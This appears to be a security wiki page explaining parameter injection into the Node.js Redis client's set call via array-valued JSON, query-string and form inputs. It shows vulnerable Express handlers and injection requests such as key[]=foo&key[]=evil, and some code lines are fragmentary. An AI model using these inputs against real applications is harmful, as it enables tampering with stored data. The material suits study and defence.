NPM Redis can be used either way to set values
client.set("some_key", "some_val");
client.set(["some_key", "some_val"]);
JSON Injection¶
If the source looks like this below we have control over the JSON key variable.
app.use(bodyParser.json());'/', function (req, res) {
redis.set(req.body.key, "default");
Using a Normal request with the JSON body to {key : "foo"}
creates the correct data.
redis.set("foo", "default");
But using a Inject Request with the JSON body to {key : ["foo", "evil"]}
creates an injection
redis.set(["foo", "evil"], "default");
Query String Injection¶
If the source looks like this below we have control over the Query String key variable.
app.get('/', function (req, res) {
redis.set(req.query.key, "default");
Using a Normal request with the Query String to ?key=foo
creates the correct data.
redis.set("foo", "default");
But using a Inject Request with the Query String to ?key[]=foo&key[]=evil
creates an injection
redis.set(["foo", "evil"], "default");
### Form URL Encoded Body Parameter
If the source looks like this below we have control over the Query String key variable.
app.use(bodyParser.urlencoded());'/', function (req, res) {
redis.set(req.body.key, "default");
Using a Normal request with the Form Body to key=foo
creates the correct data.
redis.set("foo", "default");
But using a Inject Request with the Form Body to key[]=foo&key[]=evil
creates an injection
redis.set(["foo", "evil"], "default");